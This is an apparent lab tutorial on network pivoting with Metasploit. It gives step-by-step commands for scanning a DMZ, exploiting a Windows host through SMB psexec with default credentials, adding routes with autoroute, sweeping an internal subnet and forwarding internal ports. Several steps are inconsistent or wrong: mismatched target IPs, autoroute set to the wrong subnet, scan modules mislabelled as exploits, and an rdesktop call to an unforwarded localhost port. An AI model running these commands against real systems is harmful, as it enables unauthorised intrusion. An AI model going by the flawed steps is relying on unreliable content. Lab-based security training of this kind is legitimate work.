Pivoting Using Metasploit Framework: Detailed Guide

1. Introduction 

Pivoting is a crucial technique in penetration testing that allows attackers to access internal networks that are not directly reachable from their attacking machine. This guide covers step-by-step instructions on how to use Metasploit Framework to achieve pivoting, including all necessary commands. 

2. Lab Setup 

Virtual Machines Required: 

• Kali Linux (Attacker Machine) 

• Windows  (Pivot Machine) – Connected to both DMZ and Internal Network 

• Basic Pentesting 1 (Internal Network Machine) 

Kali linux : https://cdimage.kali.org/kali-2025.1a/kali-linux-2025.1a-virtualbox-amd64.7z 

Windows : https://drive.google.com/uc?id=1-cDEpDRl5_-QWBU8Ckpp_Zep-1-9-EY4&export=download 

Basic Pentesting 1: https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova 

Network Configuration: 

Network	IP Range	Machine
DMZ	192.168.56.0/24	Kali Linux & Metasploitable-3
Internal	192.168.138.0/24	Windows  & Basic Pentesting 1

The attacker’s Kali Linux machine has access only to the DMZ network, while the target Basic Pentesting 1 machine is in the internal network and not directly accessible. 

3. Step-by-Step Exploitation and Pivoting Process 

Step 1: Scanning and Identifying the Pivot Host 

1. Identify available machines in the DMZ network using nmap: 

1. netdiscover  

1. Scan open ports on Metasploitable-3: 

1. nmap -p- 192.168.56.101 –open 

1. Identify SMB service: 

1. nmap -p 445 –script smb-os-discovery 192.168.56.101 

Step 2: Exploiting the Windows  Machine 

1. Open Metasploit: 

1. msfconsole 

1. Select and configure the psexec module to exploit SMB: 

1. use exploit/windows/smb/psexec 

1. set RHOSTS 192.168.50.101 

1. set SMBUser vagrant 

1. set SMBPass vagrant 

1. set LHOST eth0 

1. set LPORT 4444 

1. exploit 

1. Once exploited, verify access: 

1. sysinfo 

1. ipconfig 

Expected Output: Should show network interfaces connected to both DMZ and Internal Network. 

Step 3: Setting Up Pivoting (Autoroute) 

1. Background the session: 

1. background 

1. Check existing sessions: 

1. sessions -i 

1. Use the autoroute module: 

1. use post/multi/manage/autoroute 

1. set SESSION 1 

1. set SUBNET 192.168.56.0/24 

1. run 

1. Verify routing setup: 

1. route print 

Step 4: Scanning the Internal Network 

1. Ping sweep to find active hosts: 

1. use auxiliary/scanner/discovery/arp_sweep 

1. set RHOSTS 192.168.138.0 /24 

1. run 

1. Scan open ports on discovered internal hosts: 

1. use post/multi/gather/ping_sweep 

1. set RHOSTS 192.168.138.0/24 

1. set SESSION 1 

1. run 

Step 5: Exploiting the Internal Network 

1. Use Metasploit’s  to attack an internal host: 

1. use auxiliary/scanner/portscan/tcp 

1. set RHOSTS 192.168.138.103 

1. run 

Step 6: Port Forwarding (Access Internal Services) 

1. Forward an internal web server port to the attacker’s machine: 

1. sessions -i  1 

1. portfwd add -l 8080 -p 80 -r 192.168.138.103 

1. portfwd add -l 2222 -p 22 -r 192.168.138.103 

1. Now, access the internal web server at http://127.0.0.1:8080 on Kali. 

Then use Remote Desktop Client: 

rdesktop 127.0.0.1 

4. Summary & Key Takeaways 

• Pivoting allows access to networks that are not directly reachable from the attacker’s machine. 

• Metasploit’s autoroute module is used to establish network routes via a compromised host. 

• Port forwarding enables access to internal services through a pivot machine. 

• Scanning and enumeration of the internal network are crucial before exploitation. 

This guide provides a structured approach to pivoting, ensuring complete network compromise through an efficient and tactical penetration testing methodology.